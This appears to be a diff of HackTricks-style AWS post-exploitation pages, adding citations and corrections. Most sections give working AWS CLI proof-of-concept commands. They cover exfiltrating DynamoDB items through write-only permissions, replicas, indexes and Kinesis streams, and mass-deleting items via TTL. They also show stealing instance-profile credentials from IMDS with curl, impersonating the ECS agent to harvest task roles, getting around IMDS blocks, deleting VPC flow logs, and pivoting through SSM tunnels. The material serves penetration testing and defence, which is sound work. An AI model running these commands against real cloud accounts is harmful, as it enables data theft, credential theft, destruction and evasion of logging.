+    --stream-arn "$STREAM_ARN" \
     --region <region>
 ```
 
@@ -348,10 +350,10 @@ aws dynamodbstreams get-records \
 
 ### Read items via `dynamodb:UpdateItem` and `ReturnValues=ALL_OLD`
 
-An attacker with only `dynamodb:UpdateItem` on a table can read items without any of the usual read permissions (`GetItem`/`Query`/`Scan`) by performing a benign update and requesting `--return-values ALL_OLD`. DynamoDB will return the full pre-update image of the item in the `Attributes` field of the response (this does not consume RCUs).
+Where the IAM policy permits returning all attributes, a principal with only `dynamodb:UpdateItem` on a table can read items without the usual read permissions (`GetItem`/`Query`/`Scan`) by performing a benign update and requesting `--return-values ALL_OLD`. DynamoDB returns the full pre-update image in the `Attributes` field (this does not consume read capacity units).<sup>[[17]](#references)[[24]](#references)</sup>
 
-- Minimum permissions: `dynamodb:UpdateItem` on the target table/key.
-- Prerequisites: You must know the item's primary key.
+- Minimum permissions: `dynamodb:UpdateItem` on the target table/key.<sup>[[17]](#references)</sup>
+- Prerequisites: You must know the item's primary key.<sup>[[17]](#references)</sup>
 
 Example (adds a harmless attribute and exfiltrates the previous item in the response):
 
@@ -366,14 +368,14 @@ aws dynamodb update-item \
   --region <region>
 ```
 
-The CLI response will include an `Attributes` block containing the complete previous item (all attributes), effectively providing a read primitive from write-only access.
+The CLI response includes an `Attributes` block containing the complete previous item (all attributes), effectively providing a read primitive from write-only access.<sup>[[17]](#references)</sup>
 
 **Potential Impact:** Read arbitrary items from a table with only write permissions, enabling sensitive data exfiltration when primary keys are known.
 
 
 ### `dynamodb:UpdateTable (replica-updates)` | `dynamodb:CreateTableReplica`
 
-Stealth exfiltration by adding a new replica Region to a DynamoDB Global Table (version 2019.11.21). If a principal can add a regional replica, the whole table is replicated to the attacker-chosen Region, from which the attacker can read all items.
+Stealth exfiltration by adding a new replica Region to a DynamoDB Global Table (version 2019.11.21). Global-table replicas share the table's item data, so a principal that can add a regional replica can copy the table to an attacker-chosen Region and read the replica there.<sup>[[25]](#references)[[26]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="PoC (default DynamoDB-managed KMS)" }}
@@ -406,16 +408,16 @@ aws dynamodb update-table \
 {{#endtab }}
 {{#endtabs }}
 
-Permissions: `dynamodb:UpdateTable` (with `replica-updates`) or `dynamodb:CreateTableReplica` on the target table. If CMK is used in the replica, KMS permissions for that key may be required.
+Permissions: adding a replica with `UpdateTable` requires `dynamodb:UpdateTable` on the source table plus replica-side permissions including `dynamodb:CreateTable`, `dynamodb:CreateTableReplica`, `dynamodb:Query`, `dynamodb:Scan`, `dynamodb:UpdateItem`, `dynamodb:PutItem`, `dynamodb:GetItem`, `dynamodb:DeleteItem`, and `dynamodb:BatchWriteItem`. If a customer-managed KMS key is used in the replica, permissions for that key may also be required.<sup>[[26]](#references)</sup>
 
 Potential Impact: Full-table replication to an attacker-controlled Region leading to stealthy data exfiltration.
 
-### `dynamodb:TransactWriteItems` (read via failed condition + `ReturnValuesOnConditionCheckFailure=ALL_OLD`)
+### Read items via `Update` in `dynamodb:TransactWriteItems`
 
-An attacker with transactional write privileges can exfiltrate the full attributes of an existing item by performing an `Update` inside `TransactWriteItems` that intentionally fails a `ConditionExpression` while setting `ReturnValuesOnConditionCheckFailure=ALL_OLD`. On failure, DynamoDB includes the prior attributes in the transaction cancellation reasons, effectively turning write-only access into read access of targeted keys.
+An attacker with permission to submit the transactional `Update` action can exfiltrate the full attributes of an existing item by intentionally failing a `ConditionExpression` while setting `ReturnValuesOnConditionCheckFailure=ALL_OLD`. On failure, DynamoDB includes the prior attributes in the transaction's cancellation reasons, effectively turning write-only access into read access of targeted keys.<sup>[[27]](#references)[[28]](#references)</sup>
 
 {{#tabs }}
-{{#tab name="PoC (AWS CLI >= supports cancellation reasons)" }}
+{{#tab name="PoC (AWS CLI failure trigger)" }}
 
 ```bash
 # Create the transaction input (list form for --transact-items)
@@ -435,12 +437,11 @@ cat > /tmp/tx_items.json << 'JSON'
 ]
 JSON
 
-# Execute. Newer AWS CLI versions support returning cancellation reasons
+# Execute; this fails with TransactionCanceledException.
 aws dynamodb transact-write-items \
   --transact-items file:///tmp/tx_items.json \
-  --region <region> \
-  --return-cancellation-reasons
-# The command fails with TransactionCanceledException; parse cancellationReasons[0].Item
+  --region <region>
+# Use an SDK response to inspect CancellationReasons[0].Item.
 ```
 
 {{#endtab }}
@@ -465,19 +466,19 @@ except c.exceptions.TransactionCanceledException as e:
 {{#endtab }}
 {{#endtabs }}
 
-Permissions: `dynamodb:TransactWriteItems` on the target table (and the underlying item). No read permissions are required.
+Permissions: the IAM actions that authorize the transaction member operation—in this case `dynamodb:UpdateItem` on the target table. There is no standalone `dynamodb:TransactWriteItems` IAM action, and no read permission is required for this write path.<sup>[[24]](#references)[[29]](#references)</sup>
 
 Potential Impact: Read arbitrary items (by primary key) from a table using only transactional write privileges via the returned cancellation reasons.
 
 
 ### `dynamodb:UpdateTable` + `dynamodb:UpdateItem` + `dynamodb:Query` on GSI
 
-Bypass read restrictions by creating a Global Secondary Index (GSI) with `ProjectionType=ALL` on a low-entropy attribute, set that attribute to a constant value across items, then `Query` the index to retrieve full items. This works even if `Query`/`Scan` on the base table is denied, as long as you can query the index ARN.
+Bypass read restrictions by creating a Global Secondary Index (GSI) with `ProjectionType=ALL` on a low-entropy attribute, setting that attribute to a constant value across items, and then querying the index to retrieve full items. An `ALL` projection copies every base-table attribute into the index, and IAM supports granting `Query` on the index ARN even when access to the base table is denied.<sup>[[20]](#references)[[24]](#references)[[30]](#references)</sup>
 
 - Minimum permissions:
-  - `dynamodb:UpdateTable` on the target table (to create the GSI with `ProjectionType=ALL`).
-  - `dynamodb:UpdateItem` on the target table keys (to set the indexed attribute on each item).
-  - `dynamodb:Query` on the index resource ARN (`arn:aws:dynamodb:<region>:<account-id>:table/<TableName>/index/<IndexName>`).
+  - `dynamodb:UpdateTable` on the target table (to create the GSI with `ProjectionType=ALL`).<sup>[[20]](#references)</sup>
+  - `dynamodb:UpdateItem` on the target table keys (to set the indexed attribute on each item).<sup>[[17]](#references)</sup>
+  - `dynamodb:Query` on the index resource ARN (`arn:aws:dynamodb:<region>:<account-id>:table/<TableName>/index/<IndexName>`).<sup>[[24]](#references)</sup>
 
 Steps (PoC in us-east-1):
 
@@ -524,12 +525,13 @@ aws dynamodb query --table-name HTXIdx --index-name ExfilIndex \
 
 ### `dynamodb:EnableKinesisStreamingDestination` (Continuous exfiltration via Kinesis Data Streams)
 
-Abusing DynamoDB Kinesis streaming destinations to continuously exfiltrate changes from a table into an attacker-controlled Kinesis Data Stream. Once enabled, every INSERT/MODIFY/REMOVE event is forwarded near real-time to the stream without needing read permissions on the table.
+Abusing a DynamoDB Kinesis streaming destination can continuously exfiltrate item-level changes from a table into an attacker-controlled Kinesis Data Stream. Once enabled, DynamoDB replicates those changes near real time without requiring the caller to read the table directly.<sup>[[31]](#references)[[32]](#references)</sup>
 
 Minimum permissions (attacker):
-- `dynamodb:EnableKinesisStreamingDestination` on the target table
-- Optionally `dynamodb:DescribeKinesisStreamingDestination`/`dynamodb:DescribeTable` to monitor status
-- Read permissions on the attacker-owned Kinesis stream to consume records: `kinesis:*`
+- `dynamodb:EnableKinesisStreamingDestination` on the target table.<sup>[[24]](#references)</sup>
+- Optionally `dynamodb:DescribeKinesisStreamingDestination`/`dynamodb:DescribeTable` to monitor status.<sup>[[24]](#references)</sup>
+- Read permissions on the attacker-owned Kinesis stream to consume records (for example, `kinesis:DescribeStreamSummary`, `kinesis:ListShards`, `kinesis:GetShardIterator`, and `kinesis:GetRecords`).<sup>[[33]](#references)</sup>
+- `iam:CreateServiceLinkedRole` may be needed the first time Kinesis streaming for DynamoDB is enabled in the account.<sup>[[24]](#references)[[33]](#references)</sup>
 
 <details>
 <summary>PoC (us-east-1)</summary>
@@ -552,12 +554,12 @@ aws kinesis wait stream-exists --stream-name htx-ddb-exfil --region us-east-1
 
 # 3) Enable the DynamoDB -> Kinesis streaming destination
 STREAM_ARN=$(aws kinesis describe-stream-summary --stream-name htx-ddb-exfil \
-  --region us-east-1 --query StreamDescriptionSummary.StreamARN --output text)
+  --region us-east-1 --query 'StreamDescriptionSummary.StreamARN' --output text)
 aws dynamodb enable-kinesis-streaming-destination \
   --table-name HTXKStream --stream-arn "$STREAM_ARN" --region us-east-1
 # Optionally wait until ACTIVE
 aws dynamodb describe-kinesis-streaming-destination --table-name HTXKStream \
-  --region us-east-1 --query KinesisDataStreamDestinations[0].DestinationStatus
+  --region us-east-1 --query 'KinesisDataStreamDestinations[0].DestinationStatus'
 
 # 4) Generate changes on the table
 aws dynamodb put-item --table-name HTXKStream \
@@ -567,14 +569,14 @@ aws dynamodb put-item --table-name HTXKStream \
 aws dynamodb update-item --table-name HTXKStream \
   --key file:///tmp/htx_key_a1.json \
   --update-expression "SET #i = :v" \
-  --expression-attribute-names {#i:info} \
-  --expression-attribute-values {:v:{S:updated}} \
+  --expression-attribute-names '{"#i":"info"}' \
+  --expression-attribute-values '{":v":{"S":"updated"}}' \
   --region us-east-1
 # /tmp/htx_key_a1.json -> {"id":{"S":"a1"}}
 
 # 5) Consume from Kinesis to observe DynamoDB images
 SHARD=$(aws kinesis list-shards --stream-name htx-ddb-exfil --region us-east-1 \
-  --query Shards[0].ShardId --output text)
+  --query 'Shards[0].ShardId' --output text)
 IT=$(aws kinesis get-shard-iterator --stream-name htx-ddb-exfil --shard-id "$SHARD" \
   --shard-iterator-type TRIM_HORIZON --region us-east-1 --query ShardIterator --output text)
 aws kinesis get-records --shard-iterator "$IT" --limit 10 --region us-east-1 > /tmp/krec.json
@@ -588,21 +590,25 @@ aws kinesis delete-stream --stream-name htx-ddb-exfil --enforce-consumer-deletio
 aws dynamodb delete-table --table-name HTXKStream --region us-east-1 || true
 ```
 
+</details>
+
+**Potential Impact:** Continuous, near real-time exfiltration of table changes to an attacker-controlled Kinesis stream without direct read operations on the table.<sup>[[31]](#references)[[32]](#references)</sup>
+
 ### `dynamodb:UpdateTimeToLive`
 
-An attacker with the dynamodb:UpdateTimeToLive permission can change a table’s TTL (time-to-live) configuration — enabling or disabling TTL. When TTL is enabled, individual items that contain the configured TTL attribute will be automatically deleted once their expiration time is reached. The TTL value is just another attribute on each item; items without that attribute are not affected by TTL-based deletion.
+An attacker with the `dynamodb:UpdateTimeToLive` permission can change a table’s TTL configuration—enabling or disabling TTL. The expiry timestamp is a numeric Unix-epoch attribute; items with an expired value are deleted on a best-effort basis, typically within a few days, while items without that attribute are unaffected.<sup>[[34]](#references)[[35]](#references)</sup>
 
-If items do not already contain the TTL attribute, the attacker would also need a permission that updates items (for example dynamodb:UpdateItem) to add the TTL attribute and trigger mass deletions.
+If items do not already contain the TTL attribute, the attacker would also need a permission that updates items (for example, `dynamodb:UpdateItem`) to add the TTL attribute and trigger mass deletions.<sup>[[17]](#references)[[35]](#references)</sup>
 
-First enable TTL on the table, specifying the attribute name to use for expiration:
+First enable TTL on the table, specifying the attribute name to use for expiration:<sup>[[34]](#references)[[35]](#references)</sup>
 
 ```bash
 aws dynamodb update-time-to-live \
   --table-name <TABLE_NAME> \
-  --time-to-live-specification "Enabled=true, AttributeName=<TTL_ATTRIBUTE_NAME>"
+  --time-to-live-specification "Enabled=true,AttributeName=<TTL_ATTRIBUTE_NAME>"
 ```
 
-Then update items to add the TTL attribute (epoch seconds) so they will expire and be removed:
+Then update items to add the TTL attribute (epoch seconds) so they will expire and be removed:<sup>[[17]](#references)[[35]](#references)</sup>
 
 ```bash
 aws dynamodb update-item \
@@ -612,11 +618,11 @@ aws dynamodb update-item \
   --expression-attribute-values '{":t":{"N":"<EPOCH_SECONDS_VALUE>"}}'
 ```
 
-### `dynamodb:RestoreTableFromAwsBackup` & `dynamodb:RestoreTableToPointInTime`
+### `dynamodb:RestoreTableFromBackup`, `dynamodb:RestoreTableToPointInTime` (and `dynamodb:RestoreTableFromAwsBackup` for AWS Backup recovery points)
 
-An attacker with dynamodb:RestoreTableFromAwsBackup or dynamodb:RestoreTableToPointInTime permissions can create new tables restored from backups or from point-in-time recovery (PITR) without overwriting the original table. The restored table contains a full image of the data at the selected point, so the attacker can use it to exfiltrate historical information or obtain a complete dump of the database’s past state.
+`dynamodb:RestoreTableFromBackup` creates a new table from an on-demand backup, while `dynamodb:RestoreTableToPointInTime` creates a new table containing the source table's state at the selected point. `dynamodb:RestoreTableFromAwsBackup` is the separate permission-only action for restoring an AWS Backup recovery point. These operations leave the source table in place, so the restored data can expose historical information once the attacker has read access.<sup>[[14]](#references)[[24]](#references)[[36]](#references)</sup>
 
-Restore a DynamoDB table from an on-demand backup:
+Restore a DynamoDB table from an on-demand backup:<sup>[[14]](#references)</sup>
 
 ```bash
 aws dynamodb restore-table-from-backup \
@@ -624,19 +630,54 @@ aws dynamodb restore-table-from-backup \
   --backup-arn <BACKUP_ARN>
 ```
 
-Restore a DynamoDB table to a point in time (create a new table with the restored state):
+Restore a DynamoDB table to a point in time (create a new table with the restored state):<sup>[[36]](#references)</sup>
 
 ```bash
 aws dynamodb restore-table-to-point-in-time \
   --source-table-name <SOURCE_TABLE_NAME> \
   --target-table-name <NEW_TABLE_NAME> \
   --use-latest-restorable-time
-````
-
-</details>
-
-**Potential Impact:** Continuous, near real-time exfiltration of table changes to an attacker-controlled Kinesis stream without direct read operations on the table.
+```
 
 
+
+## References
+
+- [1] [BatchGetItem - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_BatchGetItem.html)
+- [2] [DescribeTable - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_DescribeTable.html)
+- [3] [GetItem - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_GetItem.html)
+- [4] [TransactGetItems - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_TransactGetItems.html)
+- [5] [Query - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Query.html)
+- [6] [Condition - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html)
+- [7] [Scan - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Scan.html)
+- [8] [PartiQL select statements for DynamoDB - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/ql-reference.select.html)
+- [9] [ExecuteStatement - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_ExecuteStatement.html)
+- [10] [BatchExecuteStatement - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_BatchExecuteStatement.html)
+- [11] [ExportTableToPointInTime - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_ExportTableToPointInTime.html)
+- [12] [Requesting a table export in DynamoDB - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/S3DataExport_Requesting.html)
+- [13] [UpdateContinuousBackups - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_UpdateContinuousBackups.html)
+- [14] [RestoreTableFromBackup - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_RestoreTableFromBackup.html)
+- [15] [CreateBackup - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_CreateBackup.html)
+- [16] [PutItem - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_PutItem.html)
+- [17] [UpdateItem - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_UpdateItem.html)
+- [18] [DeleteTable - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_DeleteTable.html)
+- [19] [DeleteBackup - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_DeleteBackup.html)
+- [20] [UpdateTable - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_UpdateTable.html)
+- [21] [DescribeStream - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_streams_DescribeStream.html)
+- [22] [GetShardIterator - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_streams_GetShardIterator.html)
+- [23] [GetRecords - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_streams_GetRecords.html)
+- [24] [Actions, resources, and condition keys for Amazon DynamoDB](https://docs.aws.amazon.com/service-authorization/latest/reference/list_dynamodb.html)
+- [25] [Global tables core concepts - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/globaltables-CoreConcepts.html)
+- [26] [DynamoDB global tables security - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/globaltables-security.html)
+- [27] [TransactWriteItems - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_TransactWriteItems.html)
+- [28] [CancellationReason - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_CancellationReason.html)
+- [29] [transact_write_items - Boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/dynamodb/client/transact_write_items.html)
+- [30] [Using Global Secondary Indexes in DynamoDB - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/GSI.html)
+- [31] [EnableKinesisStreamingDestination - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_EnableKinesisStreamingDestination.html)
+- [32] [Using Kinesis Data Streams to capture changes to DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/kds.html)
+- [33] [Using IAM policies for Amazon Kinesis Data Streams and Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/kds_iam.html)
+- [34] [UpdateTimeToLive - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_UpdateTimeToLive.html)
+- [35] [Using time to live (TTL) in DynamoDB - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/TTL.html)
+- [36] [RestoreTableToPointInTime - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_RestoreTableToPointInTime.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - EC2, EBS, SSM & VPC Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## EC2 & VPC
 
 For more information check:
@@ -12,7 +10,7 @@ For more information check:
 
 ### **Malicious VPC Mirror -** `ec2:DescribeInstances`, `ec2:RunInstances`, `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress`, `ec2:CreateTrafficMirrorTarget`, `ec2:CreateTrafficMirrorSession`, `ec2:CreateTrafficMirrorFilter`, `ec2:CreateTrafficMirrorFilterRule`
 
-VPC traffic mirroring **duplicates inbound and outbound traffic for EC2 instances within a VPC** without the need to install anything on the instances themselves. This duplicated traffic would commonly be sent to something like a network intrusion detection system (IDS) for analysis and monitoring.\
+VPC traffic mirroring **duplicates inbound and outbound traffic for EC2 instances within a VPC** without the need to install anything on the instances themselves. This duplicated traffic would commonly be sent to something like a network intrusion detection system (IDS) for analysis and monitoring.<sup>[[10]](#references)</sup>\
 An attacker could abuse this to capture all the traffic and obtain sensitive information from it:
 
 For more information check this page:
@@ -23,7 +21,7 @@ aws-malicious-vpc-mirror.md
 
 ### Copy Running Instance
 
-Instances usually contain some kind of sensitive information. There are different ways to get inside (check [EC2 privilege escalation tricks](../../aws-privilege-escalation/aws-ec2-privesc/README.md)). However, another way to check what it contains is to **create an AMI and run a new instance (even in your own account) from it**:
+Instances usually contain some kind of sensitive information. There are different ways to get inside (check [EC2 privilege escalation tricks](../../aws-privilege-escalation/aws-ec2-privesc/README.md)). However, another way to check what it contains is to **create an AMI and run a new instance (even in your own account) from it**.<sup>[[11]](#references)</sup>
 
 ```shell
 # List instances
@@ -51,7 +49,7 @@ aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west
 
 ### EBS Snapshot dump
 
-**Snapshots are backups of volumes**, which usually will contain **sensitive information**, therefore checking them should disclose this information.\
+**Snapshots are backups of volumes**, which usually will contain **sensitive information**, therefore checking them should disclose this information.<sup>[[13]](#references)</sup>\
 If you find a **volume without a snapshot** you could: **Create a snapshot** and perform the following actions or just **mount it in an instance** inside the account:
 
 {{#ref}}
@@ -185,25 +183,25 @@ For [**more information check this**](../../aws-privilege-escalation/aws-ec2-pri
 
 ### ECS-on-EC2 IMDS Abuse and ECS Agent Impersonation (ECScape)
 
-On ECS with the EC2 launch type, the control plane assumes each task role and pushes the temporary credentials down to the ECS agent over the Agent Communication Service (ACS) WebSocket channel. The agent then serves those credentials to containers via the task metadata endpoint (169.254.170.2). The ECScape research shows that if a container can reach IMDS and steal the **instance profile**, it can impersonate the agent over ACS and receive **every task role credential** on that host, including **task execution role** credentials that are not exposed via the metadata endpoint.
+On ECS with the EC2 launch type, the control plane assumes each task role and pushes the temporary credentials down to the ECS agent over the Agent Communication Service (ACS) WebSocket channel. The agent then serves those credentials to containers via the task metadata endpoint (169.254.170.2). The ECScape research shows that if a container can reach IMDS and steal the **instance profile**, it can impersonate the agent over ACS and receive **every task role credential** on that host, including **task execution role** credentials that are not exposed via the metadata endpoint.<sup>[[1]](#references)[[5]](#references)[[6]](#references)[[7]](#references)</sup>
 
 #### Attack chain
 
-1. **Steal the container instance role from IMDS.** IMDS access is required to obtain the host role used by the ECS agent.
+1. **Steal the container instance role from IMDS.** IMDS access is required to obtain the host role used by the ECS agent.<sup>[[1]](#references)[[5]](#references)</sup>
 
    ```bash
    TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
    curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
      http://169.254.169.254/latest/meta-data/iam/security-credentials/{InstanceProfileName}
    ```
-2. **Discover the ACS poll endpoint and required identifiers.** Using the instance role credentials, call `ecs:DiscoverPollEndpoint` to obtain the ACS endpoint and gather identifiers such as the cluster ARN and container instance ARN. The cluster ARN is exposed via task metadata (169.254.170.2/v4/), while the container instance ARN can be obtained via the agent introspection API or (if allowed) `ecs:ListContainerInstances`.
-3. **Impersonate the ECS agent over ACS.** Initiate a SigV4-signed WebSocket to the poll endpoint and include `sendCredentials=true`. ECS accepts the connection as a valid agent session and begins streaming `IamRoleCredentials` messages for **all** tasks on the instance. This includes task execution role credentials, which can unlock ECR pulls, Secrets Manager retrievals, or CloudWatch Logs access.
+2. **Discover the ACS poll endpoint and required identifiers.** Using the instance role credentials, call `ecs:DiscoverPollEndpoint` to obtain the ACS endpoint and gather identifiers such as the cluster ARN and container instance ARN. The cluster ARN is exposed via task metadata (169.254.170.2/v4/), while the container instance ARN can be obtained via the agent introspection API or (if allowed) `ecs:ListContainerInstances`.<sup>[[1]](#references)[[5]](#references)[[7]](#references)</sup>
+3. **Impersonate the ECS agent over ACS.** Initiate a SigV4-signed WebSocket to the poll endpoint and include `sendCredentials=true`. ECS accepts the connection as a valid agent session and begins streaming `IamRoleCredentials` messages for **all** tasks on the instance. This includes task execution role credentials, which can unlock ECR pulls, Secrets Manager retrievals, or CloudWatch Logs access.<sup>[[1]](#references)[[5]](#references)[[6]](#references)</sup>
 
-**Find the PoC in <https://github.com/naorhaziz/ecscape>**
+**Find the PoC in <https://github.com/naorhaziz/ecscape>**<sup>[[6]](#references)</sup>
 
 #### IMDS reachability with IMDSv2 + hop limit 1
 
-Setting IMDSv2 with `HttpTokens=required` and `HttpPutResponseHopLimit=1` only blocks tasks that live behind an extra hop (Docker bridge). Other networking modes stay within one hop of the Nitro controller and still receive responses:
+Setting IMDSv2 with `HttpTokens=required` and `HttpPutResponseHopLimit=1` only blocks tasks that live behind an extra hop (Docker bridge). Other networking modes stay within one hop of the Nitro controller and still receive responses.<sup>[[2]](#references)[[8]](#references)[[9]](#references)</sup>
 
 | ECS network mode | IMDS reachable? | Reason |
 | --- | --- | --- |
@@ -211,19 +209,19 @@ Setting IMDSv2 with `HttpTokens=required` and `HttpPutResponseHopLimit=1` only b
 | `host` | ✅ | Tasks share the host namespace, so they see the same hop distance as the EC2 instance. |
 | `bridge` | ❌ | Responses die on the Docker bridge because that extra hop exhausts the hop limit. |
 
-Therefore, **never assume hop limit 1 protects awsvpc or host-mode workloads**—always test from inside your containers.
+Therefore, **never assume hop limit 1 protects awsvpc or host-mode workloads**—always test from inside your containers.<sup>[[2]](#references)[[8]](#references)[[9]](#references)</sup>
 
 #### Detecting IMDS blocks per network mode
 
-- **awsvpc tasks:** Security groups, NACLs, or routing tweaks cannot block the link-local 169.254.169.254 address because Nitro injects it on-host. Check `/etc/ecs/ecs.config` for `ECS_AWSVPC_BLOCK_IMDS=true`. If the flag is missing (default) you can curl IMDS directly from the task. If it is set, pivot into the host/agent namespace to flip it back or execute your tooling outside awsvpc.
+- **awsvpc tasks:** Security groups, NACLs, or routing tweaks cannot block the link-local 169.254.169.254 address because Nitro injects it on-host. Check `/etc/ecs/ecs.config` for `ECS_AWSVPC_BLOCK_IMDS=true`. If the flag is missing (default) you can curl IMDS directly from the task. If it is set, pivot into the host/agent namespace to flip it back or execute your tooling outside awsvpc.<sup>[[2]](#references)[[3]](#references)[[7]](#references)</sup>
 
-- **bridge mode:** When metadata requests fail even though hop limit 1 is configured, defenders probably inserted a `DOCKER-USER` drop rule such as `--in-interface docker+ --destination 169.254.169.254/32 --jump DROP`. Listing `iptables -S DOCKER-USER` exposes it, and root access lets you delete or reorder the rule before querying IMDS.
+- **bridge mode:** With hop limit 1, IMDS responses normally fail because the Docker bridge consumes the extra hop. Defenders may also add a `DOCKER-USER` drop rule such as `--in-interface docker+ --destination 169.254.169.254/32 --jump DROP`; listing `iptables -S DOCKER-USER` exposes such rules.<sup>[[2]](#references)[[3]](#references)[[7]](#references)</sup>
 
-- **host mode:** Inspect the agent configuration for `ECS_ENABLE_TASK_IAM_ROLE_NETWORK_HOST=false`. That setting removes task IAM roles entirely, so you must either re-enable it, move to awsvpc tasks, or steal credentials through another process on the host. When the value is `true` (default), every host-mode process—including compromised containers—can hit IMDS unless bespoke eBPF/cgroup filters target `169.254.169.254`; look for tc/eBPF programs or iptables rules referencing that address.
+- **host mode:** Inspect the agent configuration for `ECS_ENABLE_TASK_IAM_ROLE_NETWORK_HOST=false`. This setting controls whether host-network tasks receive task IAM-role credentials; it is not an IMDS firewall. Host-network containers share the host network namespace, so block `169.254.169.254` separately when protecting the instance profile.<sup>[[2]](#references)[[3]](#references)[[7]](#references)</sup>
 
-Latacora even released [Terraform validation code](https://github.com/latacora/ecs-on-ec2-gaps-in-imds-hardening) you can drop into a target account to enumerate which network modes still expose metadata and plan your next hop accordingly.
+Latacora even released [Terraform validation code](https://github.com/latacora/ecs-on-ec2-gaps-in-imds-hardening) you can drop into a target account to enumerate which network modes still expose metadata and plan your next hop accordingly.<sup>[[3]](#references)</sup>
 
-Once you understand which modes expose IMDS you can plan your post-exploitation path: target any ECS task, request the instance profile, impersonate the agent, and harvest every other task role for lateral movement or persistence inside the cluster.
+Once you understand which modes expose IMDS you can plan your post-exploitation path: target any ECS task, request the instance profile, impersonate the agent, and harvest every other task role for lateral movement or persistence inside the cluster.<sup>[[1]](#references)[[5]](#references)[[6]](#references)</sup>
 
 ### Remove VPC flow logs
 
@@ -235,12 +233,12 @@ aws ec2 delete-flow-logs --flow-log-ids <flow_log_ids> --region <region>
 
 Required permissions:
 
-- `ssm:StartSession`
+- `ssm:StartSession`<sup>[[15]](#references)</sup>
 
 In addition to command execution, SSM allows for traffic tunneling which can be abused to pivot from EC2 instances that do not have network access because of Security Groups or NACLs.
-One of the scenarios where this is useful is pivoting from a [Bastion Host](https://www.geeksforgeeks.org/what-is-aws-bastion-host/) to a private EKS cluster.
+One of the scenarios where this is useful is pivoting from a bastion host to a private EKS cluster.<sup>[[4]](#references)[[15]](#references)</sup>
 
-> In order to start a session you need the SessionManagerPlugin installed: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html
+> In order to start a session you need the SessionManagerPlugin installed: https://docs.aws.amazon.com/systems-manager/latest/userguide/session-manager-working-with-install-plugin.html<sup>[[16]](#references)</sup>
 
 1. Install the SessionManagerPlugin on your machine
 2. Log in to the Bastion EC2 using the following command:
@@ -272,13 +270,13 @@ kubectl get pods --insecure-skip-tls-verify
 
 Note that the SSL connections will fail unless you set the `--insecure-skip-tls-verify ` flag (or its equivalent in K8s audit tools). Seeing that the traffic is tunnelled through the secure AWS SSM tunnel, you are safe from any sort of MitM attacks.
 
-Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application.
+Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application.<sup>[[15]](#references)</sup>
 
 ---
 
 #### Quick Local ↔️ Remote Port Forward (AWS-StartPortForwardingSession)
 
-If you only need to forward **one TCP port from the EC2 instance to your local host** you can use the `AWS-StartPortForwardingSession` SSM document (no remote host parameter required):
+If you only need to forward **one TCP port from the EC2 instance to your local host** you can use the `AWS-StartPortForwardingSession` SSM document (no remote host parameter required).<sup>[[4]](#references)[[15]](#references)</sup>
 
 ```bash
 aws ssm start-session --target i-0123456789abcdef0 \
